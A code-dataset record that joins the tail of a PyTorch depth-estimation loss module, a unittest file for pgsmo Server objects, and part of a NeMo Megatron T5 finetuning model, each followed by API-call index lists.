        a1 += (ratio < 1.25).float().mean()
        a2 += (ratio < 1.25 ** 2).float().mean()
        a3 += (ratio < 1.25 ** 3).float().mean()
        residual = valid_gt - valid_pred
        abs_diff += torch.mean(torch.abs(residual))
        abs_rel += torch.mean(torch.abs(residual) / valid_gt) * 100
        sq_rel += torch.mean(residual ** 2 / valid_gt) * 100
        epe += torch.mean(residual ** 2)
    return [metric / batch_size for metric in [abs_diff, abs_rel, sq_rel, a1, a2, a3, epe]]
def VGS_loss(gt,pred):
    """Placeholder for a VGS loss — not implemented yet; always returns None."""
    pass
|
[
"torch.mean",
"process_functions.occlusion_masks",
"torch.nn.functional.binary_cross_entropy",
"torch.median",
"torch.ones",
"torch.stack",
"inverse_warp.flow_warp",
"torch.autograd.Variable",
"utils.logical_or",
"ssim.ssim",
"torch.cat",
"utils.robust_l1",
"torch.nn.functional.adaptive_avg_pool2d",
"process_functions.depth_occlusion_masks",
"inverse_warp.inverse_warp",
"torch.max",
"torch.abs"
] |
[((1030, 1080), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['tgt_img', '(h, w)'], {}), '(tgt_img, (h, w))\n', (1063, 1080), False, 'from torch import nn\n'), ((1212, 1281), 'torch.cat', 'torch.cat', (['(intrinsics[:, 0:2] / downscale, intrinsics[:, 2:])'], {'dim': '(1)'}), '((intrinsics[:, 0:2] / downscale, intrinsics[:, 2:]), dim=1)\n', (1221, 1281), False, 'import torch\n'), ((1312, 1399), 'torch.cat', 'torch.cat', (['(intrinsics_inv[:, :, 0:2] * downscale, intrinsics_inv[:, :, 2:])'], {'dim': '(2)'}), '((intrinsics_inv[:, :, 0:2] * downscale, intrinsics_inv[:, :, 2:]),\n dim=2)\n', (1321, 1399), False, 'import torch\n'), ((3232, 3290), 'process_functions.depth_occlusion_masks', 'depth_occlusion_masks', (['d', 'pose', 'intrinsics', 'intrinsics_inv'], {}), '(d, pose, intrinsics, intrinsics_inv)\n', (3253, 3290), False, 'from process_functions import depth_occlusion_masks, occlusion_masks\n'), ((3892, 3942), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['tgt_img', '(h, w)'], {}), '(tgt_img, (h, w))\n', (3925, 3942), False, 'from torch import nn\n'), ((4074, 4143), 'torch.cat', 'torch.cat', (['(intrinsics[:, 0:2] / downscale, intrinsics[:, 2:])'], {'dim': '(1)'}), '((intrinsics[:, 0:2] / downscale, intrinsics[:, 2:]), dim=1)\n', (4083, 4143), False, 'import torch\n'), ((4174, 4261), 'torch.cat', 'torch.cat', (['(intrinsics_inv[:, :, 0:2] * downscale, intrinsics_inv[:, :, 2:])'], {'dim': '(2)'}), '((intrinsics_inv[:, :, 0:2] * downscale, intrinsics_inv[:, :, 2:]),\n dim=2)\n', (4183, 4261), False, 'import torch\n'), ((5984, 6042), 'process_functions.depth_occlusion_masks', 'depth_occlusion_masks', (['d', 'pose', 'intrinsics', 'intrinsics_inv'], {}), '(d, pose, intrinsics, intrinsics_inv)\n', (6005, 6042), False, 'from process_functions import depth_occlusion_masks, occlusion_masks\n'), ((6412, 6469), 'torch.nn.functional.binary_cross_entropy', 'nn.functional.binary_cross_entropy', 
(['mask_scaled', 'ones_var'], {}), '(mask_scaled, ones_var)\n', (6446, 6469), False, 'from torch import nn\n'), ((7906, 7956), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['tgt_img', '(h, w)'], {}), '(tgt_img, (h, w))\n', (7939, 7956), False, 'from torch import nn\n'), ((9749, 9800), 'process_functions.occlusion_masks', 'occlusion_masks', (['flow_at_scale[0]', 'flow_at_scale[1]'], {}), '(flow_at_scale[0], flow_at_scale[1])\n', (9764, 9800), False, 'from process_functions import depth_occlusion_masks, occlusion_masks\n'), ((9884, 9948), 'torch.stack', 'torch.stack', (['(occ_mask_at_scale_bw, occ_mask_at_scale_fw)'], {'dim': '(1)'}), '((occ_mask_at_scale_bw, occ_mask_at_scale_fw), dim=1)\n', (9895, 9948), False, 'import torch\n'), ((11002, 11065), 'utils.logical_or', 'logical_or', (['census_mask_fwd_one_scale', 'exp_fwd_target_one_scale'], {}), '(census_mask_fwd_one_scale, exp_fwd_target_one_scale)\n', (11012, 11065), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((11102, 11165), 'utils.logical_or', 'logical_or', (['census_mask_bwd_one_scale', 'exp_bwd_target_one_scale'], {}), '(census_mask_bwd_one_scale, exp_bwd_target_one_scale)\n', (11112, 11165), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((11669, 11730), 'torch.autograd.Variable', 'Variable', (['census_mask_fwd_one_scale.data'], {'requires_grad': '(False)'}), '(census_mask_fwd_one_scale.data, requires_grad=False)\n', (11677, 11730), False, 'from torch.autograd import Variable\n'), ((11767, 11828), 'torch.autograd.Variable', 'Variable', (['census_mask_bwd_one_scale.data'], {'requires_grad': '(False)'}), '(census_mask_bwd_one_scale.data, requires_grad=False)\n', (11775, 11828), False, 'from torch.autograd import Variable\n'), ((11863, 11993), 'torch.cat', 'torch.cat', (['(census_mask_bwd_one_scale, census_mask_bwd_one_scale,\n census_mask_fwd_one_scale, census_mask_fwd_one_scale)'], {'dim': '(1)'}), 
'((census_mask_bwd_one_scale, census_mask_bwd_one_scale,\n census_mask_fwd_one_scale, census_mask_fwd_one_scale), dim=1)\n', (11872, 11993), False, 'import torch\n'), ((13887, 13933), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['img', '(h, w)'], {}), '(img, (h, w))\n', (13920, 13933), False, 'from torch import nn\n'), ((18166, 18221), 'torch.max', 'torch.max', (['(valid_gt / valid_pred)', '(valid_pred / valid_gt)'], {}), '(valid_gt / valid_pred, valid_pred / valid_gt)\n', (18175, 18221), False, 'import torch\n'), ((18597, 18618), 'torch.mean', 'torch.mean', (['(diff ** 2)'], {}), '(diff ** 2)\n', (18607, 18618), False, 'import torch\n'), ((1108, 1158), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['ref_img', '(h, w)'], {}), '(ref_img, (h, w))\n', (1141, 1158), False, 'from torch import nn\n'), ((1598, 1721), 'inverse_warp.inverse_warp', 'inverse_warp', (['ref_img', 'depth[:, 0]', 'current_pose', 'intrinsics_scaled', 'intrinsics_scaled_inv', 'rotation_mode', 'padding_mode'], {}), '(ref_img, depth[:, 0], current_pose, intrinsics_scaled,\n intrinsics_scaled_inv, rotation_mode, padding_mode)\n', (1610, 1721), False, 'from inverse_warp import inverse_warp, flow_warp\n'), ((3970, 4020), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['ref_img', '(h, w)'], {}), '(ref_img, (h, w))\n', (4003, 4020), False, 'from torch import nn\n'), ((4400, 4523), 'inverse_warp.inverse_warp', 'inverse_warp', (['ref_img', 'depth[:, 0]', 'current_pose', 'intrinsics_scaled', 'intrinsics_scaled_inv', 'rotation_mode', 'padding_mode'], {}), '(ref_img, depth[:, 0], current_pose, intrinsics_scaled,\n intrinsics_scaled_inv, rotation_mode, padding_mode)\n', (4412, 4523), False, 'from inverse_warp import inverse_warp, flow_warp\n'), ((7984, 8034), 'torch.nn.functional.adaptive_avg_pool2d', 'nn.functional.adaptive_avg_pool2d', (['ref_img', '(h, w)'], {}), '(ref_img, (h, w))\n', (8017, 8034), 
False, 'from torch import nn\n'), ((8202, 8234), 'inverse_warp.flow_warp', 'flow_warp', (['ref_img', 'current_flow'], {}), '(ref_img, current_flow)\n', (8211, 8234), False, 'from inverse_warp import inverse_warp, flow_warp\n'), ((13595, 13622), 'torch.abs', 'torch.abs', (['pred_gradients_x'], {}), '(pred_gradients_x)\n', (13604, 13622), False, 'import torch\n'), ((13656, 13683), 'torch.abs', 'torch.abs', (['pred_gradients_y'], {}), '(pred_gradients_y)\n', (13665, 13683), False, 'import torch\n'), ((13709, 13733), 'torch.mean', 'torch.mean', (['smoothness_x'], {}), '(smoothness_x)\n', (13719, 13733), False, 'import torch\n'), ((13736, 13760), 'torch.mean', 'torch.mean', (['smoothness_y'], {}), '(smoothness_y)\n', (13746, 13760), False, 'import torch\n'), ((16710, 16765), 'torch.max', 'torch.max', (['(valid_gt / valid_pred)', '(valid_pred / valid_gt)'], {}), '(valid_gt / valid_pred, valid_pred / valid_gt)\n', (16719, 16765), False, 'import torch\n'), ((17106, 17138), 'torch.mean', 'torch.mean', (['(diff ** 2 / valid_gt)'], {}), '(diff ** 2 / valid_gt)\n', (17116, 17138), False, 'import torch\n'), ((18123, 18147), 'torch.median', 'torch.median', (['valid_pred'], {}), '(valid_pred)\n', (18135, 18147), False, 'import torch\n'), ((18441, 18456), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (18450, 18456), False, 'import torch\n'), ((18540, 18572), 'torch.mean', 'torch.mean', (['(diff ** 2 / valid_gt)'], {}), '(diff ** 2 / valid_gt)\n', (18550, 18572), False, 'import torch\n'), ((16663, 16687), 'torch.median', 'torch.median', (['valid_pred'], {}), '(valid_pred)\n', (16675, 16687), False, 'import torch\n'), ((17005, 17020), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (17014, 17020), False, 'import torch\n'), ((18098, 18120), 'torch.median', 'torch.median', (['valid_gt'], {}), '(valid_gt)\n', (18110, 18120), False, 'import torch\n'), ((1935, 1971), 'ssim.ssim', 'ssim', (['tgt_img_scaled', 'ref_img_warped'], {}), '(tgt_img_scaled, ref_img_warped)\n', 
(1939, 1971), False, 'from ssim import ssim\n'), ((2797, 2831), 'utils.robust_l1', 'robust_l1', (['(1 - valid_pixels)'], {'q': 'qch'}), '(1 - valid_pixels, q=qch)\n', (2806, 2831), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((4714, 4750), 'ssim.ssim', 'ssim', (['tgt_img_scaled', 'ref_img_warped'], {}), '(tgt_img_scaled, ref_img_warped)\n', (4718, 4750), False, 'from ssim import ssim\n'), ((5550, 5584), 'utils.robust_l1', 'robust_l1', (['(1 - valid_pixels)'], {'q': 'qch'}), '(1 - valid_pixels, q=qch)\n', (5559, 5584), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((8446, 8482), 'ssim.ssim', 'ssim', (['tgt_img_scaled', 'ref_img_warped'], {}), '(tgt_img_scaled, ref_img_warped)\n', (8450, 8482), False, 'from ssim import ssim\n'), ((9123, 9157), 'utils.robust_l1', 'robust_l1', (['(1 - valid_pixels)'], {'q': 'qch'}), '(1 - valid_pixels, q=qch)\n', (9132, 9157), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((13437, 13465), 'torch.abs', 'torch.abs', (['image_gradients_x'], {}), '(image_gradients_x)\n', (13446, 13465), False, 'import torch\n'), ((13525, 13553), 'torch.abs', 'torch.abs', (['image_gradients_y'], {}), '(image_gradients_y)\n', (13534, 13553), False, 'import torch\n'), ((16638, 16660), 'torch.median', 'torch.median', (['valid_gt'], {}), '(valid_gt)\n', (16650, 16660), False, 'import torch\n'), ((17056, 17071), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (17065, 17071), False, 'import torch\n'), ((18488, 18503), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (18497, 18503), False, 'import torch\n'), ((2735, 2757), 'utils.robust_l1', 'robust_l1', (['diff'], {'q': 'qch'}), '(diff, q=qch)\n', (2744, 2757), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n'), ((5488, 5510), 'utils.robust_l1', 'robust_l1', (['diff'], {'q': 'qch'}), '(diff, q=qch)\n', (5497, 5510), False, 'from utils import robust_l1, 
logical_or, weighted_binary_cross_entropy\n'), ((6338, 6351), 'torch.ones', 'torch.ones', (['(1)'], {}), '(1)\n', (6348, 6351), False, 'import torch\n'), ((9061, 9083), 'utils.robust_l1', 'robust_l1', (['diff'], {'q': 'qch'}), '(diff, q=qch)\n', (9070, 9083), False, 'from utils import robust_l1, logical_or, weighted_binary_cross_entropy\n')]
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import re
import unittest
import unittest.mock as mock
import urllib.parse as parse
import inflection
from ossdbtoolsservice.driver.types.psycopg_driver import PostgreSQLConnection
from pgsmo.objects.database.database import Database
from pgsmo.objects.server.server import Server
from smo.common.node_object import NodeCollection, NodeLazyPropertyCollection
from tests.pgsmo_tests.utils import MockPGServerConnection
from tests.utils import MockPsycopgConnection
class TestServer(unittest.TestCase):
    """Unit tests for the pgsmo Server object: construction, recovery
    properties, maintenance-database lookup, refresh, and URN resolution."""
    # Canned row returned by the mocked recovery-state query.
    CHECK_RECOVERY_ROW = {
        'inrecovery': True,
        'isreplaypaused': True
    }
    def test_init(self):
        """Constructing a Server wires up the connection, host/port/db
        properties, and one lazily loaded NodeCollection per child type."""
        # If: I construct a new server object
        host = 'host'
        port = '1234'
        dbname = 'dbname'
        mock_conn = MockPGServerConnection(None, name=dbname, host=host, port=port)
        server = Server(mock_conn)
        # Then:
        # ... The assigned properties should be assigned
        self.assertIsInstance(server._conn, MockPGServerConnection)
        self.assertIsInstance(server.connection, MockPGServerConnection)
        self.assertIs(server.connection, mock_conn)
        self.assertEqual(server._host, host)
        self.assertEqual(server.host, host)
        self.assertEqual(server._port, port)
        self.assertEqual(server.port, port)
        self.assertEqual(server._maintenance_db_name, dbname)
        self.assertEqual(server.maintenance_db_name, dbname)
        self.assertTupleEqual(server.version, server._conn.server_version)
        # ... Recovery options should be a lazily loaded thing
        self.assertIsInstance(server._recovery_props, NodeLazyPropertyCollection)
        for key, collection in server._child_objects.items():
            # ... The child object collection a NodeCollection
            self.assertIsInstance(collection, NodeCollection)
            # ... There should be a property mapped to the node collection
            # (child keys are singular; the server exposes pluralized properties)
            prop = getattr(server, inflection.pluralize(key.lower()))
            self.assertIs(prop, collection)
    def test_recovery_properties(self):
        """in_recovery / wal_paused are read from the recovery-state query row."""
        # Setup:
        # NOTE: We're *not* mocking out the template rendering b/c this will verify that there's a template
        # ... Create a mock query execution that will return the properties
        mock_exec_dict = mock.MagicMock(return_value=([], [TestServer.CHECK_RECOVERY_ROW]))
        # ... Create an instance of the class and override the connection
        mock_connection = MockPsycopgConnection({'host': 'host', 'dbname': 'dbname'})
        with mock.patch('psycopg2.connect', new=mock.Mock(return_value=mock_connection)):
            pg_connection = PostgreSQLConnection({})
            pg_connection.execute_dict = mock_exec_dict
            obj = Server(pg_connection)
        # If: I retrieve all the values in the recovery properties
        # Then:
        # ... The properties based on the properties should be availble
        self.assertEqual(obj.in_recovery, TestServer.CHECK_RECOVERY_ROW['inrecovery'])
        self.assertEqual(obj.wal_paused, TestServer.CHECK_RECOVERY_ROW['isreplaypaused'])
    def test_maintenance_db(self):
        """maintenance_db resolves through the Database collection's indexer
        using the connection's database name."""
        # Setup:
        # ... Create a server object that has a connection
        obj = Server(MockPGServerConnection(None, name='dbname'))
        # ... Mock out the database lazy loader's indexer
        mock_db = {}
        mock_db_collection = mock.Mock()
        mock_db_collection.__getitem__ = mock.MagicMock(return_value=mock_db)
        obj._child_objects[Database.__name__] = mock_db_collection
        # If: I retrieve the maintenance db for the server
        maintenance_db = obj.maintenance_db
        # Then:
        # ... It must have come from the mock handler
        self.assertIs(maintenance_db, mock_db)
        obj._child_objects[Database.__name__].__getitem__.assert_called_once_with('dbname')
    def test_refresh(self):
        """refresh() resets every child collection and the recovery props."""
        # Setup:
        # ... Create a server object that has a connection
        obj = Server(MockPGServerConnection())
        # ... Mock out the reset methods on the various collections
        obj.databases.reset = mock.MagicMock()
        obj.roles.reset = mock.MagicMock()
        obj.tablespaces.reset = mock.MagicMock()
        obj._recovery_props.reset = mock.MagicMock()
        # If: I refresh the server
        obj.refresh()
        # Then: The collections should have been reset
        obj.databases.reset.assert_called_once()
        obj.roles.reset.assert_called_once()
        obj.tablespaces.reset.assert_called_once()
        obj._recovery_props.reset.assert_called_once()
    def test_urn_base(self):
        """urn_base has the //user@host:port shape built from the connection."""
        # Setup:
        # ... Create a server object that has a connection
        server = Server(MockPGServerConnection())
        # If: I get the URN base for the server
        urn_base = server.urn_base
        # Then: The urn base should match the expected outcome
        urn_base_regex = re.compile(r'//(?P<user>.+)@(?P<host>.+):(?P<port>\d+)')
        urn_base_match = urn_base_regex.match(urn_base)
        self.assertIsNotNone(urn_base_match)
        self.assertEqual(urn_base_match.groupdict()['user'], server.connection.user_name)
        self.assertEqual(urn_base_match.groupdict()['host'], server.host)
        self.assertEqual(urn_base_match.groupdict()['port'], server.port)
    def test_get_obj_by_urn_empty(self):
        """get_object_by_urn rejects None, empty, and whitespace-only URNs."""
        # Setup: Create a server object
        server = Server(MockPGServerConnection())
        test_cases = [None, '', '\t \n\r']
        for test_case in test_cases:
            with self.assertRaises(ValueError):
                # If: I get an object by its URN without providing a URN
                # Then: I should get an exception
                server.get_object_by_urn(test_case)
    def test_get_obj_by_urn_wrong_server(self):
        """get_object_by_urn rejects a URN whose base targets another server."""
        # Setup: Create a server object
        server = Server(MockPGServerConnection())
        with self.assertRaises(ValueError):
            # If: I get an object by its URN with a URN that is invalid for the server
            # Then: I should get an exception
            # NOTE(review): '<EMAIL>' looks like an anonymization artifact in
            # the original literal; the test only needs a base that does not
            # match server.urn_base, so it still exercises the rejection path.
            invalid_urn = '//this<EMAIL>.wrong.urn:456/Database.123/'
            server.get_object_by_urn(invalid_urn)
    def test_get_obj_by_urn_wrong_collection(self):
        """get_object_by_urn rejects a URN path naming an unknown child type."""
        # Setup: Create a server object
        server = Server(MockPGServerConnection())
        with self.assertRaises(ValueError):
            # If: I get an object by its URN with a URN that points to an invalid path off the server
            # Then: I should get an exception
            invalid_urn = parse.urljoin(server.urn_base, 'Datatype.123/')
            server.get_object_by_urn(invalid_urn)
    def test_get_obj_by_urn_success(self):
        """A valid /Database.<oid>/ URN resolves to the registered object."""
        # Setup: Create a server with a database under it
        server = Server(MockPGServerConnection())
        mock_db = Database(server, 'test_db')
        mock_db._oid = 123
        server._child_objects[Database.__name__] = {123: mock_db}
        # If: I get an object by its URN
        urn = parse.urljoin(server.urn_base, '/Database.123/')
        obj = server.get_object_by_urn(urn)
        # Then: The object I get back should be the same as the object I provided
        self.assertIs(obj, mock_db)
|
[
"tests.utils.MockPsycopgConnection",
"urllib.parse.urljoin",
"unittest.mock.MagicMock",
"ossdbtoolsservice.driver.types.psycopg_driver.PostgreSQLConnection",
"pgsmo.objects.database.database.Database",
"unittest.mock.Mock",
"pgsmo.objects.server.server.Server",
"tests.pgsmo_tests.utils.MockPGServerConnection",
"re.compile"
] |
[((1105, 1168), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', (['None'], {'name': 'dbname', 'host': 'host', 'port': 'port'}), '(None, name=dbname, host=host, port=port)\n', (1127, 1168), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((1186, 1203), 'pgsmo.objects.server.server.Server', 'Server', (['mock_conn'], {}), '(mock_conn)\n', (1192, 1203), False, 'from pgsmo.objects.server.server import Server\n'), ((2638, 2704), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {'return_value': '([], [TestServer.CHECK_RECOVERY_ROW])'}), '(return_value=([], [TestServer.CHECK_RECOVERY_ROW]))\n', (2652, 2704), True, 'import unittest.mock as mock\n'), ((2806, 2865), 'tests.utils.MockPsycopgConnection', 'MockPsycopgConnection', (["{'host': 'host', 'dbname': 'dbname'}"], {}), "({'host': 'host', 'dbname': 'dbname'})\n", (2827, 2865), False, 'from tests.utils import MockPsycopgConnection\n'), ((3075, 3096), 'pgsmo.objects.server.server.Server', 'Server', (['pg_connection'], {}), '(pg_connection)\n', (3081, 3096), False, 'from pgsmo.objects.server.server import Server\n'), ((3717, 3728), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (3726, 3728), True, 'import unittest.mock as mock\n'), ((3770, 3806), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {'return_value': 'mock_db'}), '(return_value=mock_db)\n', (3784, 3806), True, 'import unittest.mock as mock\n'), ((4439, 4455), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (4453, 4455), True, 'import unittest.mock as mock\n'), ((4482, 4498), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (4496, 4498), True, 'import unittest.mock as mock\n'), ((4531, 4547), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (4545, 4547), True, 'import unittest.mock as mock\n'), ((4584, 4600), 'unittest.mock.MagicMock', 'mock.MagicMock', ([], {}), '()\n', (4598, 4600), True, 'import unittest.mock as mock\n'), ((5244, 5300), 're.compile', 
're.compile', (['"""//(?P<user>.+)@(?P<host>.+):(?P<port>\\\\d+)"""'], {}), "('//(?P<user>.+)@(?P<host>.+):(?P<port>\\\\d+)')\n", (5254, 5300), False, 'import re\n'), ((7143, 7170), 'pgsmo.objects.database.database.Database', 'Database', (['server', '"""test_db"""'], {}), "(server, 'test_db')\n", (7151, 7170), False, 'from pgsmo.objects.database.database import Database\n'), ((7320, 7368), 'urllib.parse.urljoin', 'parse.urljoin', (['server.urn_base', '"""/Database.123/"""'], {}), "(server.urn_base, '/Database.123/')\n", (7333, 7368), True, 'import urllib.parse as parse\n'), ((2984, 3008), 'ossdbtoolsservice.driver.types.psycopg_driver.PostgreSQLConnection', 'PostgreSQLConnection', (['{}'], {}), '({})\n', (3004, 3008), False, 'from ossdbtoolsservice.driver.types.psycopg_driver import PostgreSQLConnection\n'), ((3563, 3606), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', (['None'], {'name': '"""dbname"""'}), "(None, name='dbname')\n", (3585, 3606), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((4314, 4338), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (4336, 4338), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((5045, 5069), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (5067, 5069), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((5746, 5770), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (5768, 5770), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((6189, 6213), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (6211, 6213), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((6630, 6654), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (6652, 6654), False, 'from 
tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((6875, 6922), 'urllib.parse.urljoin', 'parse.urljoin', (['server.urn_base', '"""Datatype.123/"""'], {}), "(server.urn_base, 'Datatype.123/')\n", (6888, 6922), True, 'import urllib.parse as parse\n'), ((7099, 7123), 'tests.pgsmo_tests.utils.MockPGServerConnection', 'MockPGServerConnection', ([], {}), '()\n', (7121, 7123), False, 'from tests.pgsmo_tests.utils import MockPGServerConnection\n'), ((2914, 2953), 'unittest.mock.Mock', 'mock.Mock', ([], {'return_value': 'mock_connection'}), '(return_value=mock_connection)\n', (2923, 2953), True, 'import unittest.mock as mock\n')]
|
# Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import torch
from omegaconf import DictConfig, ListConfig
from pytorch_lightning.trainer.trainer import Trainer
from nemo.collections.common.data import ConcatDataset
from nemo.collections.common.metrics import MetricStringToTorchMetric
from nemo.collections.common.metrics.classification_accuracy import ExactStringPerCategoryMatchMetric
from nemo.collections.nlp.data.common.sequence_to_sequence_dataset import SequenceToSequenceDataset
from nemo.collections.nlp.models.language_modeling.megatron_t5_model import MegatronT5Model
from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher
from nemo.utils import AppState, logging
try:
from apex.transformer import parallel_state
from apex.transformer.pipeline_parallel.utils import _reconfigure_microbatch_calculator, get_num_microbatches
HAVE_APEX = True
except (ImportError, ModuleNotFoundError):
HAVE_APEX = False
__all__ = ['MegatronT5FinetuneModel']
class MegatronT5FinetuneModel(MegatronT5Model):
    """Finetune Model that Inherits from MegatronT5Model instead."""
    def __init__(self, cfg: DictConfig, trainer: Trainer):
        """Initialize the finetuning model and build per-dataloader eval metrics.

        Args:
            cfg: Model config; ``cfg.data.validation_ds`` (and optionally
                ``cfg.data.test_ds``) drive metric construction.
            trainer: PyTorch Lightning trainer driving this model.
        """
        super().__init__(cfg, trainer=trainer)
        self.val_metric, self.val_metric_name = self.setup_metric(self.cfg.data.validation_ds)
        # Wrap metrics in a ModuleList so their state follows the model across devices.
        self.val_metric = torch.nn.ModuleList(self.val_metric)
        if hasattr(self.cfg.data, "test_ds"):
            self.test_metric, self.test_metric_name = self.setup_metric(self.cfg.data.test_ds)
            self.test_metric = torch.nn.ModuleList(self.test_metric)
    def setup_metric(self, data_cfg):
        """Build one metric object per evaluation dataloader described by *data_cfg*.

        Returns:
            Tuple of (list of metric objects, metric name string).

        Raises:
            ValueError: If a metric config is present but has no ``name``.
            KeyError: If the named metric is not in ``MetricStringToTorchMetric``.
        """
        # XNLI is a special case.
        metric_name = "exact_string_match"
        if hasattr(self.cfg, "eval_languages"):
            # XNLI: a single metric that tracks exact-string-match per language.
            metric = [ExactStringPerCategoryMatchMetric(self.cfg.eval_languages)]
        else:
            if not hasattr(data_cfg, "metric"):
                metric = MetricStringToTorchMetric["exact_string_match"]
            else:
                if not hasattr(data_cfg.metric, "name"):
                    raise ValueError("Metric name is not provided in the metric config.")
                if data_cfg.metric.name not in MetricStringToTorchMetric:
                    raise KeyError(
                        f"{data_cfg.metric.name} is not supported. List of supported metrics: {MetricStringToTorchMetric.keys()}"
                    )
                metric_name = data_cfg.metric.name
                metric = MetricStringToTorchMetric[metric_name]
            # GLUE will not have a "src_file_name" attribute and will always have only a single metric.
            if hasattr(data_cfg, "src_file_name"):
                if isinstance(data_cfg.src_file_name, ListConfig):
                    # We pass average and num_classes to the metric constructor via kwargs even if they don't exist for each metric.
                    # NOTE(review): the count is taken from cfg.data.test_ds even when
                    # *data_cfg* is the validation config — verify this is intended.
                    metric = [
                        metric(average=data_cfg.metric.average, num_classes=data_cfg.metric.num_classes)
                        for _ in range(len(self.cfg.data.test_ds.src_file_name))
                    ]
                else:
                    metric = [metric(average=data_cfg.metric.average, num_classes=data_cfg.metric.num_classes)]
            else:
                metric = [metric()]  # GLUE does not need to specify average or num_classes.
        return metric, metric_name
    def setup(self, stage=None):
        """PTL hook: build datasets and dataloaders for the requested *stage*."""
        # This is just to keep the parent class happy since we override its setup() method.
        self.init_consumed_samples = 0
        self.init_global_step = 0
        if stage == 'predict':
            return
        # NOTE: PTL uses the same stage string "test" for both testing and validation.
        self.build_train_valid_test_datasets(stage=stage)
        if hasattr(self, '_validation_ds'):
            self.setup_validation_data()
        if hasattr(self, '_test_ds'):
            self.setup_test_data()
        if hasattr(self, '_train_ds'):
            self.setup_training_data()
    def _process_global_batch(self, global_batch):
        """Process a list of microbatches into a global batch."""
        # If there is no language information in the global batch (ex: English MNLI), we can use the parent global batch processor as is.
        if 'lang' not in global_batch[0]:
            return self._process_global_batch_without_megatron_batch_sampler(global_batch)
        # For validation data (XNLI), we need to process the global batch and and then deal with language info separately.
        else:
            assert all(['lang' in micro_batch for micro_batch in global_batch])
            langs_list = []
            # Strip the 'lang' key before handing off to the parent processor, then
            # re-attach the concatenated language list to the processed batch.
            processed_global_batch = self._process_global_batch_without_megatron_batch_sampler(
                [{k: v for k, v in micro_batch.items() if k != 'lang'} for micro_batch in global_batch]
            )
            for micro_batch in global_batch:
                langs_list.extend(micro_batch['lang'])
            processed_global_batch['lang'] = langs_list
            return processed_global_batch
    def on_validation_epoch_start(self):
        """PTL hook: reconfigure apex's microbatch calculator for validation batch sizes."""
        app_state = AppState()
        _reconfigure_microbatch_calculator(
            rank=app_state.global_rank,
            rampup_batch_size=None,
            global_batch_size=self.cfg.data.validation_ds.global_batch_size,
            micro_batch_size=self.cfg.data.validation_ds.micro_batch_size,
            data_parallel_size=parallel_state.get_data_parallel_world_size(),
        )
        return super().on_validation_epoch_start()
    def on_validation_epoch_end(self):
        """PTL hook: restore the microbatch calculator to training batch sizes."""
        app_state = AppState()
        if hasattr(self, "_train_ds"):
            _reconfigure_microbatch_calculator(
                rank=app_state.global_rank,
                rampup_batch_size=None,
                global_batch_size=self.cfg.data.train_ds.global_batch_size,
                micro_batch_size=self.cfg.data.train_ds.micro_batch_size,
                data_parallel_size=parallel_state.get_data_parallel_world_size(),
            )
        # When running `trainer.validate()`, the training dataset is not available.
        else:
            logging.warning('No training data found, reconfiguring microbatches based on validation batch sizes.')
            _reconfigure_microbatch_calculator(
                rank=app_state.global_rank,
                rampup_batch_size=None,
                global_batch_size=self.cfg.data.validation_ds.global_batch_size,
                micro_batch_size=self.cfg.data.validation_ds.micro_batch_size,
                data_parallel_size=parallel_state.get_data_parallel_world_size(),
            )
        return super().on_validation_epoch_end()
    def training_step(self, batch, batch_idx):
        """Run one training step, reconfiguring microbatches for a short final batch."""
